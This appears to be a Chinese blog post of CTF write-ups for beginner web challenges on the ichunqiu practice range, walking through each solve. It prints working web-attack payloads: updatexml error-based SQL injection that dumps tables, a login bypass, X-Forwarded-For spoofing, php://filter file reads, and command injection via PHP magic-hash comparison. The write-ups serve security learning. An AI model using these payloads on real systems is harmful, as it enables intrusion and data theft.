'CTF练习题解题'

发表于 2019-11-27 更新于 2024-01-18 分类于 CTF 阅读次数：

题库传送门

https://www.ichunqiu.com/battalion

第一题 robot

打开页面，只有一张图片

想到了robot.txt和robots.txt
访问一下

但是啥也没有，看下源代码，拿到flag

第二题 seelog

字面意思访问下log

直接访问log，点access日志文件

查找页面响应码为200的信息，然后看到了这条

访问它，拿到flag

第三题 GETflag

截断了md5的0到6，我们利用大佬的脚本计算下captcha值

import hashlib
from multiprocessing.dummy import Pool as ThreadPool

# MD5截断数值已知 求原始数据
# 例子 substr(md5(captcha), 0, 6)=60b7ef

def md5(s):  # 计算MD5字符串
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()


keymd5 = 'bec83c'   #已知的md5截断值
md5start = 0   # 设置题目已知的截断位置
md5length = 6

def findmd5(sss):    # 输入范围 里面会进行md5测试
    key = sss.split(':')
    start = int(key[0])   # 开始位置
    end = int(key[1])    # 结束位置
    result = 0
    for i in range(start, end):
        # print(md5(i)[md5start:md5length])
        if md5(i)[0:6] == keymd5:            # 拿到加密字符串
            result = i
            print(result)    # 打印
            break


list=[]  # 参数列表
for i in range(10):   # 多线程的数字列表 开始与结尾
    list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool()    # 多线程任务
pool.map(findmd5, list) # 函数 与参数列表
pool.close()
pool.join()

提交上去，变成error了，现在解决账号密码的问题

试试万能密码

成功登陆，拿到三个文件

txt都没用，php文件中说明flag在根目录

抓包

直接访问flag.php ，发现并没有。。。

只能找到绝对路径，尝试linux网站的默认路径/var/www/html/
（春秋靶场的路径是/var/www/html/Challenges/flag.php）

分析代码
1，变量f是传入表单中的flag值
2，变量中这些符号'`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>' 全部变为“双引号
3，如果f的长度大于13就会输出wowwwwwwwwwwwwwwwwwwwwwwwww并结束进程
4，如果触发异常（f的字符等于spaceone的）会返回false
5.如果spaceone的值等于flag这个字符串就输出helloctf.php文件的内容

所以这里如果让spaceone等于flag就行了，且f不等于flag。
POST请求为flag=flag就好了

照常网页页面空白，直接看源代码，拿到flag

第四题 VID

查看源代码，直接访问该文件

提交get请求使flag等于对应的值

直接访问，下载该文件

我们看下login.php

Username处只运用了Safe_data函数，跟进这个函数，发现存在注入

而箭头指向的那段代码，表示在username中找我们输入的车牌号“number”，如果找到就替换成空

根据文件路径访问到登陆界面

抓包

提交时number必须为0，然后对username进行报错注入

爆表，有flag和users表

and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)#

分段爆flag
and updatexml(1,concat(1,substr((select * from flag),1,15)),3)#

拿到最终flag

第五题 ipspoofing

访问页面，发现是一个个人博客之类的网站

拉到最底下

点击进入登陆页面

查看源代码，有提示

登陆说不在ip范围内

抓包改包，XFF头，利用modify heafers插件

修改IP为127.0.0.1拿到flag

第六题 PHPinfo

这题没啥好说的，文件包含

但发现啥也咩有，用其他伪协议，输出base64
php://filter/convert.base64-encode/resource=flag.php

解码拿到flag

第七题天下武功唯快不破

通过代码审计：
利用setcookie把hello赋给token，并生成一个cookie
file_get_contents函数是把整个文件读入一个字符串中
file_put_contents($filename,$txt) 把变量txt里的每一个字符写入到filebame中

这里的大致意思为当token=hello是，把flag.php文件里的字符导入到路径:/u/通过md5加密的一个1到1000的的密文.txt，而且在10秒后进行删除，所以我们的速度必须要快

我们利用大佬的脚本，进行提交

import requests
import re
import hashlib
for i in range(0,1001):
    m1 = hashlib.md5()
    m1.update(str(i).encode(encoding='utf-8'))
    url='http://117.50.93.218:7004/u/'+m1.hexdigest()+'.txt'
    r = requests.get(url)
    if(r.status_code!=404):
        print(i)
        print(url)
        print(r.status_code)
        print(r.text)
        break
    else:
        print(i)
        print("404")

利用脚本进行破解，成功获取（爆不出来，可以尝试在爆的过程中多对页面进行刷新）

忘了是哪道，网鼎杯的练习题

分析代码

if((@file_get_contents($a,'r')===$b)&&(@file_get_contents($e,'r')==="I'm Administrator!"))

a要与b的值绝对相等，r值要为I’m Administrator!
靶场IP 192.168.1.1 (具体地址忘了，我们假装他是这个IP)
VPS IP 192.168.1.2
利用hackbar发送GET请求
a=http://192.168.1.2/a.txt&b=125&e=I’m Administrator!&c=class.php

别问我class.php是哪来的，是从robots.txt看到的

之后发现没有显示，然后利用伪协议把输出变成base64

解码之后得到如下
查看源码，获取代码

<?php
#class.php

$m1 = $_GET['m1'];
$m2 = $_GET['m2'];
$cmd = $_GET['cmd'];

if (md5($m1) == md5($m2) && $m1 != $m2) {
    # cat flag.php
    echo "Place cat flag !";
    if (preg_match('/cat/i', $cmd)) {
        die('Hacker!');
    }
    system($cmd);
}

分析代码if语句中含义是，m1不等于m2，但是m1的md5值要相等于m2的md5值，这就涉及到我知识的盲区了，最后百度到这篇文章。
利用md5的缺陷https://www.cnblogs.com/Primzahl/p/6018158.html
PHP在处理哈希字符串时，会利用”!=”或”==”来对哈希值进行比较，它把每一个以”0E”开头的哈希值都解释为0，所以如果两个不同的密码经过哈希以后，其哈希值都是以”0E”开头的，那么PHP将会认为他们相同，都是0。

而且最后一行system函数说明$cmd可以执行系统命令
一开始使用cat的，没成功，之后换了more查看
m1=QNKCDZO&m2=s878926199a&cmd=more flag.php

查看源码，获取 flag{danjfb-asdfss-vsdfsa-fdsdaf-cvfsfa}